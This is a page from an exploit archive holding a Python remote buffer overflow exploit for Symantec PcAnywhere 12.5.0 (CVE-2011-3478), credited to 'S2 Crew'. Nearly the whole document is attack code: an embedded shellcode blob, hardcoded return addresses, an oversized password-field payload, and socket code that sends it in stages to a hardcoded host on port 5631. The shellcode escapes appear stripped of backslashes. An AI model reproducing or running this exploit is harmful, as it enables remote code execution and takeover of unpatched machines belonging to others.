Symantec PcAnywhere 12.5.0 Login and Password Field Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Symantec PcAnywhere 12.5.0 Login and Password Field Buffer Overflow
# Published : 2012-06-27
# Author :
# Previous Title : Siemens Simatic S7-300/400 CPU START/STOP Module
# Next Title : Active Collab "chat module" <= 2.3.8 Remote PHP Code Injection Exploit

#!/usr/bin/python

# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
# Date: 2012.06.27
# Author: S2 Crew [Hungary]
# Software Link: symantec.com
# Version: 12.5.0
# Tested on: Windows XP SP2
# CVE: CVE-2011-3478 
 
# Code :
import socket
import time
import struct
import string
import sys

shell = (
"xdaxdaxbbx9ex7fxfbx04xd9x74x24xf4x58x2bxc9"
"xb1x56x31x58x18x03x58x18x83xc0x9ax9dx0exf8"
"x4axe8xf1x01x8ax8bx78xe4xbbx99x1fx6cxe9x2d"
"x6bx20x01xc5x39xd1x92xabx95xd6x13x01xc0xd9"
"xa4xa7xccxb6x66xa9xb0xc4xbax09x88x06xcfx48"
"xcdx7bx3fx18x86xf0xedx8dxa3x45x2dxafx63xc2"
"x0dxd7x06x15xf9x6dx08x46x51xf9x42x7exdaxa5"
"x72x7fx0fxb6x4fx36x24x0dx3bxc9xecx5fxc4xfb"
"xd0x0cxfbx33xddx4dx3bxf3x3dx38x37x07xc0x3b"
"x8cx75x1exc9x11xddxd5x69xf2xdfx3axefx71xd3"
"xf7x7bxddxf0x06xafx55x0cx83x4exbax84xd7x74"
"x1exccx8cx15x07xa8x63x29x57x14xdcx8fx13xb7"
"x09xa9x79xd0xfex84x81x20x68x9exf2x12x37x34"
"x9dx1exb0x92x5ax60xebx63xf4x9fx13x94xdcx5b"
"x47xc4x76x4dxe7x8fx86x72x32x1fxd7xdcxecxe0"
"x87x9cx5cx89xcdx12x83xa9xedxf8xb2xedx23xd8"
"x97x99x41xdex06x06xcfx38x42xa6x99x93xfax04"
"xfex2bx9dx77xd4x07x36xe0x60x4ex80x0fx71x44"
"xa3xbcxd9x0fx37xafxddx2ex48xfax75x38x71x6d"
"x0fx54x30x0fx10x7dxa2xacx83x1ax32xbaxbfxb4"
"x65xebx0excdxe3x01x28x67x11xd8xacx40x91x07"
"x0dx4ex18xc5x29x74x0ax13xb1x30x7excbxe4xee"
"x28xadx5ex41x82x67x0cx0bx42xf1x7ex8cx14xfe"
"xaax7axf8x4fx03x3bx07x7fxc3xcbx70x9dx73x33"
"xabx25x83x7exf1x0cx0cx27x60x0dx51xd8x5fx52"
"x6cx5bx55x2bx8bx43x1cx2exd7xc3xcdx42x48xa6"
"xf1xf1x69xe3"
)
init1 = (
"x00x00x00x00" # kezdeti handshake
)

init2 = (
"x0dx06xfe" # Enter username uzenet koveti (NTdialog)
)

init3 = (
"A" * 100 #+ "r" #username
)

readable_xp_sp2 = struct.pack('<L',0x023E5AD0)
call_esi = struct.pack('<L',0x67f7aac4)
jmp = struct.pack('<L',0x414112EB)

init4 = (
"B" * 1282 + jmp + readable_xp_sp2 + "DDDD" +call_esi + "AAAA" + shell + "E" * (4000 - 1286 - 12 - len(shell))
)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('172.16.29.133',5631)) # hardcoded IP address

print "init packet..."
s.send(init1) # send the data
time.sleep(5)
data = s.recv(1024)

print "handshake packet..."
s.send(init2) # send the data
time.sleep(5)
data = s.recv(1024)

print "username packet..."
s.send(init3) # send the data
time.sleep(5)
#data = s.recv(1024)

print "password packet..."
s.send(init4) # send the data
s.close()